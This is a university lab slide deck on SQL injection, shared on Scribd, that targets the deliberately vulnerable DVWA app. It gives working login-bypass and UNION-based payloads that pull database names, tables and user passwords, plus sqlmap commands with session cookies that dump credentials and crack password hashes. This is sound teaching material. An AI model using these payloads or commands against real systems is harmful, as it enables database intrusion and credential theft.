KEMBAR78
Chapter 9 - LAB - Database Security | PDF | Software Engineering | Password
Scribd
Upload
153 views8 pages

Chapter 9 - LAB - Database Security

The document discusses SQL injection attacks and how to use sqlmap to exploit vulnerabilities. It provides examples of using sqlmap against the Damn Vulnerable Web Application (DVWA) to obtain information like database usernames and passwords, database names, table names, and user data like usernames and passwords from tables. The document instructs on downloading DVWA and sqlmap and running commands with sqlmap to retrieve various pieces of sensitive information from the target database and server.

Uploaded by

Thy Trân
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
153 views8 pages

Chapter 9 - LAB - Database Security

The document discusses SQL injection attacks and how to use sqlmap to exploit vulnerabilities. It provides examples of using sqlmap against the Damn Vulnerable Web Application (DVWA) to obtain information like database usernames and passwords, database names, table names, and user data like usernames and passwords from tables. The document instructs on downloading DVWA and sqlmap and running commands with sqlmap to retrieve various pieces of sensitive information from the target database and server.

Uploaded by

Thy Trân
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 8

4/2/2018

 

Lecturer: Nguyễn Thị Thanh Vân – FIT - HCMUTE

 SQL Injection attacks


o Example
 Damn Vulnerable Web App – DVWA
o Examples
 Sqlmap
o Examples

4/1/2018 2

1
4/2/2018

 SQL Injections can do more harm than just by passing


the login algorithms. Some of the attacks include
o Deleting data
o Updating data
o Inserting data
o Executing commands on the server that can download and
install malicious programs such as Trojans
o Exporting valuable data such as credit card details, email, and
passwords to the attacker’s remote server
o Getting user login details etc

4/1/2018 3

 Crack username/password
o SQL query:
SELECT * FROM Users WHERE Username='$username' AND
Password='$password‘

o Type:
$username = 1' or '1' = '1$password = 1' or '1' = '1

o The query will be:


SELECT * FROM Users WHERE Username='1' OR '1' = '1'
AND Password='1' OR '1' = '1'
 => always true (OR 1=1) => the system has authenticated the user
without knowing the username and password.

4/1/2018 4

2
4/2/2018

 SQL query:
SELECT * FROM products WHERE id_product=$id_product
ex:
http://www.example.com/product.php?id=10

 Using the operators AND and OR.


SELECT * FROM products WHERE id_product=10 AND 1=2
Ex:
http://www.example.com/product.php?id=10 AND 1=2
=> there is no content available or a blank page.

 Then, send a true statement and check if there is a valid result:


Ex: http://www.example.com/product.php?id=10 AND 1=1

4/1/2018 5

 Damn Vulnerable Web App (DVWA) is a PHP/MySQL web


application that is damn vulnerable. Its main goals are to be an aid for
security professionals to test
 1.1 Download DVWA
 1.2 Create database and user in DVWA
 1.3 Config DVWA
 1.4 Setup basic database in DVWA
 1.5 Access DVWA
http://10.0.0.2/login.php
 Set DVWA Security Level: Low

4/1/2018 6

3
4/2/2018

 Basic Injection: 1
 Always True Scenario: %' or '0'='0
 Display Database Version :
o %' or 0=0 union select null, version() #
 Display Database User:
o %' or 0=0 union select null, user() #
 Display Database Name
o %' or 0=0 union select null, database() #
 Display all tables in information_schema
o %' and 1=0 union select null, table_name from
information_schema.tables #

4/1/2018 7

 Display all the user tables in information_schema


o %' and 1=0 union select null, table_name from
information_schema.tables where table_name like 'user%'#
 Display all the columns fields in the information_schema
user table
o %' and 1=0 union select null,
concat(table_name,0x0a,column_name) from
information_schema.columns where table_name = 'users' #
 Display all the columns field contents in the
information_schema user table
o %' and 1=0 union select null,
concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from
users #

4/1/2018 8

4
4/2/2018

 sqlmap is an open source penetration testing tool that


automates the process of
o detecting and exploiting SQL injection flaws
o taking over of database servers.
 It comes with a kick-ass detection engine
 Many niche features
o the ultimate penetration tester
o a broad range of switches lasting from database fingerprinting,
o over data fetching from the database,
o to accessing the underlying file system and executing
commands on the operating system via out-of-band connections.
 Download and install Sqlmap
http://sqlmap.sourceforge.net/doc/README.html#s1
4/2/2018 9

 Open firefox: add Tamper Data to Tool


 Select Tool\Tamper Data
 Start Tamper Data

4/1/2018 10

5
4/2/2018

 Run SQL injection


 Tamper with request
o Copying the Referer URL (Ref)
Ex: http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit
o Copying the Cookie Information (Coo)
Ex: PHPSESSID=lpb5g4uss9kp70p8jccjeks621; security=low
 Run sqlmap to obtain the following pieces of information
o Obtain Database User For DVWA. Syntax:
./sqlmap.py –u <Ref> --cookie <Coo> -b --current-db --current-user
o Ex: ./sqlmap.py -u
"http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit"
--cookie="PHPSESSID=lpb5g4uss9kp70p8jccjeks621;
security=low" -b --current-db --current-user
Do you want to keep testing? Y => Result
4/1/2018 11

 Run sqlmap
o Obtain Database Management Username and Password. Syntax:
./sqlmap.py –u <ref> --cookie <Coo> --string="Surname" --users –
password
Use Dictionary Attack? Y
Dictionary Location? <Press Enter>
o Obtain db_hacker Database Privileges. Syntax:
./sqlmap.py –u <ref> --cookie <Coo> -U db_hacker –privileges
o Obtain a list of all databases.
./sqlmap.py –u <ref> --cookie <Coo> --dbs
o Obtain "dvwa" tables and contents
./sqlmap.py –u <ref> --cookie <Coo> -D dvwa --tables
o Obtain columns for table dvwa.users
./sqlmap.py –u <ref> -- cookie <Coo> -D dvwa -T users --columns 12

6
4/2/2018

 Run sqlmap
o Obtain Users and their Passwords from table dvwa.users. Syntax:
./sqlmap.py –u <ref> --cookie <Coo> -D dvwa -T users -C
user,password –dump
Do you want to use the LIKE operator? Y
Recognize possible HASH values? Y
What's the dictionary location? <Press Enter>
Use common password suffixes? y

13

 use sqlmap to obtain the following pieces of information:


o A list of Database Management Usernames and Passwords.
o A list of databases
o A list of tables for a specified database
o A list of users and passwords for a specified database table.

4/1/2018 14

7
4/2/2018

4/1/2018 15

You might also like